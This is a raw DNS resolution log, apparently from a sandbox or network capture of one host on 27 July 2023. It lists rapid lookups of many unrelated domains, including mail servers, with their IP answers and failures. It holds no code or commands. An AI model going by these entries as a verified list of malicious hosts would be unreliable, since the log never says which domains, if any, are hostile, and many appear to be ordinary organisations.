                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:18.568376064 CEST8.8.8.8192.168.2.40x896No error (0)forbin.net104.21.41.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:18.581708908 CEST8.8.8.8192.168.2.40xdc89No error (0)websy.com13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:18.581708908 CEST8.8.8.8192.168.2.40xdc89No error (0)websy.com76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:18.631743908 CEST8.8.8.8192.168.2.40xe9d6Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:18.815453053 CEST8.8.8.8192.168.2.40xdc8dNo error (0)mijash3.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:18.815453053 CEST8.8.8.8192.168.2.40xdc8dNo error (0)mijash3.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:18.815453053 CEST8.8.8.8192.168.2.40xdc8dNo error (0)mijash3.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:18.815453053 CEST8.8.8.8192.168.2.40xdc8dNo error (0)mijash3.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:18.857408047 CEST8.8.8.8192.168.2.40x7784Server failure (2)avc.com.sanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:18.940443993 CEST8.8.8.8192.168.2.40x35d6No error (0)smitko.net31.15.12.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:18.949038982 CEST8.8.8.8192.168.2.40xde66No error (0)scip.org.uk104.26.13.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:18.949038982 CEST8.8.8.8192.168.2.40xde66No error (0)scip.org.uk104.26.12.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:18.949038982 CEST8.8.8.8192.168.2.40xde66No error (0)scip.org.uk172.67.72.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:18.994349003 CEST8.8.8.8192.168.2.40xe6cNo error (0)s5w.com192.99.226.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:19.013520002 CEST8.8.8.8192.168.2.40xc494Server failure (2)avc.com.sanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:19.062541008 CEST8.8.8.8192.168.2.40x1422No error (0)roewer.de45.142.176.225A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:19.101736069 CEST8.8.8.8192.168.2.40xb241No error (0)camamat.com104.21.235.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:19.101736069 CEST8.8.8.8192.168.2.40xb241No error (0)camamat.com104.21.235.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:19.105065107 CEST8.8.8.8192.168.2.40x80acServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:19.168134928 CEST8.8.8.8192.168.2.40x30d3No error (0)www.wnsavoy.com96.91.204.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:19.317007065 CEST8.8.8.8192.168.2.40x8153No error (0)acraloc.com185.230.63.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:19.426903963 CEST8.8.8.8192.168.2.40xad65No error (0)wvs-net.de188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:19.426903963 CEST8.8.8.8192.168.2.40xad65No error (0)wvs-net.de188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:19.535049915 CEST8.8.8.8192.168.2.40xb951No error (0)shteeble.com185.106.129.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:19.564553022 CEST8.8.8.8192.168.2.40x697bNo error (0)ftchat.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:19.564553022 CEST8.8.8.8192.168.2.40x697bNo error (0)ftchat.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:19.683931112 CEST8.8.8.8192.168.2.40xe9d6Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:19.762268066 CEST8.8.8.8192.168.2.40x9159No error (0)ifesnet.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:19.762268066 CEST8.8.8.8192.168.2.40x9159No error (0)ifesnet.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:19.788173914 CEST8.8.8.8192.168.2.40x2cfaNo error (0)captlfix.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:19.788173914 CEST8.8.8.8192.168.2.40x2cfaNo error (0)captlfix.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:19.788173914 CEST8.8.8.8192.168.2.40x2cfaNo error (0)captlfix.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:19.788173914 CEST8.8.8.8192.168.2.40x2cfaNo error (0)captlfix.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:19.829751968 CEST8.8.8.8192.168.2.40xea01No error (0)wvs-net.de188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:19.829751968 CEST8.8.8.8192.168.2.40xea01No error (0)wvs-net.de188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:19.835340023 CEST8.8.8.8192.168.2.40xd88fNo error (0)kairel.com54.217.118.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:19.867285967 CEST8.8.8.8192.168.2.40x5bc6No error (0)bosado.com5.39.75.157A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:19.930862904 CEST8.8.8.8192.168.2.40x6008No error (0)kewlmail.com63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:20.015697956 CEST8.8.8.8192.168.2.40xf89dNo error (0)banvari.com23.227.38.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:20.152640104 CEST8.8.8.8192.168.2.40x6e7bNo error (0)komie.com59.106.13.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:20.179294109 CEST8.8.8.8192.168.2.40x80acServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:20.290158987 CEST8.8.8.8192.168.2.40x373dNo error (0)hamaker.net34.102.136.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:20.295737028 CEST8.8.8.8192.168.2.40x554eNo error (0)vivastay.comtraff-4.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:20.295737028 CEST8.8.8.8192.168.2.40x554eNo error (0)traff-4.hugedomains.comhdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:20.295737028 CEST8.8.8.8192.168.2.40x554eNo error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com3.94.41.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:20.295737028 CEST8.8.8.8192.168.2.40x554eNo error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com52.86.6.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:20.334080935 CEST8.8.8.8192.168.2.40x17b6Server failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:20.381351948 CEST8.8.8.8192.168.2.40xc54fName error (3)www.yumgiskor.kznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:20.392062902 CEST8.8.8.8192.168.2.40x2d0Server failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:20.433988094 CEST8.8.8.8192.168.2.40x632fServer failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:20.497833967 CEST8.8.8.8192.168.2.40x2fbfNo error (0)zupraha.cz77.78.104.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:20.538371086 CEST8.8.8.8192.168.2.40xb4d2Server failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:20.578668118 CEST8.8.8.8192.168.2.40xe1a2Server failure (2)cjcagent.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:20.603199005 CEST8.8.8.8192.168.2.40x98bName error (3)pcoyuncu.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:20.661341906 CEST8.8.8.8192.168.2.40xab53No error (0)nettle.pl195.128.140.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:20.693403006 CEST8.8.8.8192.168.2.40x3001No error (0)smtp.compuserve.comeast.us.smtp.aol.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:20.693403006 CEST8.8.8.8192.168.2.40x3001No error (0)east.us.smtp.aol.comsmtp.aol.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:20.693403006 CEST8.8.8.8192.168.2.40x3001No error (0)smtp.aol.comsmtp.cs.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:20.693403006 CEST8.8.8.8192.168.2.40x3001No error (0)smtp.cs.comsmtp.aol.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:20.693403006 CEST8.8.8.8192.168.2.40x3001No error (0)smtp.aol.g03.yahoodns.net87.248.97.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:20.718066931 CEST8.8.8.8192.168.2.40x92fbNo error (0)scintel.com23.239.201.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:20.730735064 CEST8.8.8.8192.168.2.40xe9d6Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:20.778342009 CEST8.8.8.8192.168.2.40x58c0Server failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:20.819786072 CEST8.8.8.8192.168.2.40xaea6No error (0)nolaoig.org54.212.145.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:20.971350908 CEST8.8.8.8192.168.2.40x880bNo error (0)nettle.pl195.128.140.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:20.995637894 CEST8.8.8.8192.168.2.40xad8bNo error (0)cqdgroup.com221.132.33.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:21.058434010 CEST8.8.8.8192.168.2.40x328aNo error (0)skypearl.com153.122.170.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:21.153016090 CEST8.8.8.8192.168.2.40xba21No error (0)skypearl.com153.122.170.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:21.154768944 CEST8.8.8.8192.168.2.40x2333Server failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:21.284634113 CEST8.8.8.8192.168.2.40x7a37No error (0)isom.org192.124.249.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:21.323910952 CEST8.8.8.8192.168.2.40xe4e2No error (0)ccrsi.org198.209.253.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:21.467749119 CEST8.8.8.8192.168.2.40x861dNo error (0)notis.ru185.178.208.141A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:21.730204105 CEST8.8.8.8192.168.2.40x39ecNo error (0)pers.com192.124.249.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:21.798516035 CEST8.8.8.8192.168.2.40xf223No error (0)komie.com59.106.13.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:21.800504923 CEST8.8.8.8192.168.2.40x397bNo error (0)webavant.com148.72.176.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:21.838180065 CEST8.8.8.8192.168.2.40x847fNo error (0)refintl.org198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:21.838180065 CEST8.8.8.8192.168.2.40x847fNo error (0)refintl.org198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:21.838180065 CEST8.8.8.8192.168.2.40x847fNo error (0)refintl.org198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:21.838180065 CEST8.8.8.8192.168.2.40x847fNo error (0)refintl.org198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:21.895180941 CEST8.8.8.8192.168.2.40x91f8No error (0)pellys.co.uk77.72.4.226A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:22.082943916 CEST8.8.8.8192.168.2.40xc4a3No error (0)cjborden.com15.197.142.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:22.082943916 CEST8.8.8.8192.168.2.40xc4a3No error (0)cjborden.com3.33.152.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:22.104509115 CEST8.8.8.8192.168.2.40x58f9Name error (3)anteph.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:22.139698029 CEST8.8.8.8192.168.2.40x80acServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:22.159533024 CEST8.8.8.8192.168.2.40x7050Name error (3)anteph.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:22.167972088 CEST8.8.8.8192.168.2.40x5babNo error (0)peminet.net198.54.117.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:22.199943066 CEST8.8.8.8192.168.2.40xfd1dName error (3)anteph.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:22.248442888 CEST8.8.8.8192.168.2.40x51fbNo error (0)ludea.cz46.8.8.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:22.381189108 CEST8.8.8.8192.168.2.40xa441No error (0)holp-ai.com59.106.13.169A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:22.517105103 CEST8.8.8.8192.168.2.40x59f1No error (0)t-trust.jp183.181.82.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:22.647115946 CEST8.8.8.8192.168.2.40xf74aName error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:22.654367924 CEST8.8.8.8192.168.2.40x3951No error (0)redgiga.com104.21.76.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:22.654367924 CEST8.8.8.8192.168.2.40x3951No error (0)redgiga.com172.67.186.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:22.697316885 CEST8.8.8.8192.168.2.40x377bNo error (0)esmoke.net204.15.134.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:22.713344097 CEST8.8.8.8192.168.2.40x7868Name error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:22.740299940 CEST8.8.8.8192.168.2.40xe9d6Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:22.883387089 CEST8.8.8.8192.168.2.40xb3f8No error (0)scip.org.uk172.67.72.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:22.883387089 CEST8.8.8.8192.168.2.40xb3f8No error (0)scip.org.uk104.26.12.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:22.883387089 CEST8.8.8.8192.168.2.40xb3f8No error (0)scip.org.uk104.26.13.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:22.883969069 CEST8.8.8.8192.168.2.40x88cbNo error (0)oozkranj.com212.44.102.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:23.048376083 CEST8.8.8.8192.168.2.40xb5d7Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:23.143768072 CEST8.8.8.8192.168.2.40x340fNo error (0)www.jacomfg.com96.127.180.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:23.172919035 CEST8.8.8.8192.168.2.40x785cName error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:23.357507944 CEST8.8.8.8192.168.2.40x841aNo error (0)shiner.com172.67.143.148A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:23.357507944 CEST8.8.8.8192.168.2.40x841aNo error (0)shiner.com104.21.27.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:23.368624926 CEST8.8.8.8192.168.2.40x6244No error (0)ntc.edu.au192.124.249.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:23.391307116 CEST8.8.8.8192.168.2.40x29b0No error (0)jsaps.com49.212.235.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:23.419888020 CEST8.8.8.8192.168.2.40x8c02No error (0)pellys.co.uk77.72.4.226A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:23.448734045 CEST8.8.8.8192.168.2.40x326dNo error (0)pellys.co.uk77.72.4.226A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:23.810153008 CEST8.8.8.8192.168.2.40x4ef4No error (0)shteeble.com185.106.129.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:23.821866989 CEST8.8.8.8192.168.2.40x69eeNo error (0)kairel.com54.217.118.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:23.823270082 CEST8.8.8.8192.168.2.40xe4a8No error (0)valselit.com193.70.68.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:23.828305006 CEST8.8.8.8192.168.2.40x4315No error (0)jabian.com104.26.7.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:23.828305006 CEST8.8.8.8192.168.2.40x4315No error (0)jabian.com172.67.71.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:23.828305006 CEST8.8.8.8192.168.2.40x4315No error (0)jabian.com104.26.6.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:23.828769922 CEST8.8.8.8192.168.2.40x9655No error (0)cvswl.org188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:23.828769922 CEST8.8.8.8192.168.2.40x9655No error (0)cvswl.org188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:23.845079899 CEST8.8.8.8192.168.2.40x7f31No error (0)e-kami.net202.172.28.89A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:23.857033968 CEST8.8.8.8192.168.2.40x7722No error (0)www.ex-olive.com210.140.73.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:23.886461973 CEST8.8.8.8192.168.2.40x5450No error (0)atbauk.org172.67.196.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:23.886461973 CEST8.8.8.8192.168.2.40x5450No error (0)atbauk.org104.21.92.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:23.972533941 CEST8.8.8.8192.168.2.40x3dfeNo error (0)isom.org192.124.249.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:24.059315920 CEST8.8.8.8192.168.2.40xb5d7Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:24.069988966 CEST8.8.8.8192.168.2.40x9021No error (0)wantapc.net157.7.107.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:24.105865002 CEST8.8.8.8192.168.2.40xca9fNo error (0)rokoron.com211.13.204.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:24.123136044 CEST8.8.8.8192.168.2.40xdf9fNo error (0)t-trust.jp183.181.82.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:24.339555025 CEST8.8.8.8192.168.2.40x48afNo error (0)cnti.krsn.ru217.74.161.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:25.075303078 CEST8.8.8.8192.168.2.40xb5d7Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:25.369745970 CEST8.8.8.8192.168.2.40xa88eNo error (0)mjrcpas.com204.11.56.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:25.464308023 CEST8.8.8.8192.168.2.40x1718No error (0)cbaben.com173.205.126.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:25.465400934 CEST8.8.8.8192.168.2.40x201cNo error (0)tabbles.net80.211.41.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:25.568742037 CEST8.8.8.8192.168.2.40x1008No error (0)willsub.com69.89.107.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:25.703798056 CEST8.8.8.8192.168.2.40xe439No error (0)a-domani.com183.90.232.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:25.750225067 CEST8.8.8.8192.168.2.40x5736Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:25.806698084 CEST8.8.8.8192.168.2.40x4ed9No error (0)mail.airmail.net66.226.70.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:26.116084099 CEST8.8.8.8192.168.2.40xe29bNo error (0)oaith.ca192.124.249.12A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:26.266213894 CEST8.8.8.8192.168.2.40x6c5eNo error (0)doggybag.org213.186.33.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:26.310157061 CEST8.8.8.8192.168.2.40xdcb6No error (0)jnf.at136.243.147.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:26.414849997 CEST8.8.8.8192.168.2.40x5762No error (0)thiessen.net62.75.251.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:26.437268972 CEST8.8.8.8192.168.2.40x9238No error (0)www.reglera.comreglera.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:26.437268972 CEST8.8.8.8192.168.2.40x9238No error (0)reglera.com64.125.133.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:26.718050003 CEST8.8.8.8192.168.2.40x4b51No error (0)siongann.com172.67.156.237A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:26.718050003 CEST8.8.8.8192.168.2.40x4b51No error (0)siongann.com104.21.8.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:26.746817112 CEST8.8.8.8192.168.2.40x5736Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:26.949548960 CEST8.8.8.8192.168.2.40x9096No error (0)semuk.com86.105.245.69A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:27.057852030 CEST8.8.8.8192.168.2.40x5669No error (0)t-mould.com81.169.145.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:27.061256886 CEST8.8.8.8192.168.2.40xd815No error (0)anduran.comtraff-4.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:27.061256886 CEST8.8.8.8192.168.2.40xd815No error (0)traff-4.hugedomains.comhdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:27.061256886 CEST8.8.8.8192.168.2.40xd815No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com52.86.6.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:27.061256886 CEST8.8.8.8192.168.2.40xd815No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com3.94.41.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:27.121936083 CEST8.8.8.8192.168.2.40xb5d7Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:27.238114119 CEST8.8.8.8192.168.2.40xc1dcNo error (0)rtcasey.com69.195.90.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:27.294413090 CEST8.8.8.8192.168.2.40xd5b1No error (0)tcpoa.com159.89.244.183A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:27.294413090 CEST8.8.8.8192.168.2.40xd5b1No error (0)tcpoa.com164.90.244.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:27.325201988 CEST8.8.8.8192.168.2.40x6bbcNo error (0)lpver.com92.204.129.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:27.344517946 CEST8.8.8.8192.168.2.40x6093No error (0)gydrozo.ru91.220.211.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:27.608553886 CEST8.8.8.8192.168.2.40xbfdbNo error (0)fortknox.bm216.177.137.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:27.659329891 CEST8.8.8.8192.168.2.40x4cbfNo error (0)wvs-net.de188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:27.659329891 CEST8.8.8.8192.168.2.40x4cbfNo error (0)wvs-net.de188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:27.740041018 CEST8.8.8.8192.168.2.40x9822No error (0)kustnara.com75.2.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:27.740041018 CEST8.8.8.8192.168.2.40x9822No error (0)kustnara.com99.83.190.102A (IP address)IN (0x0001)false
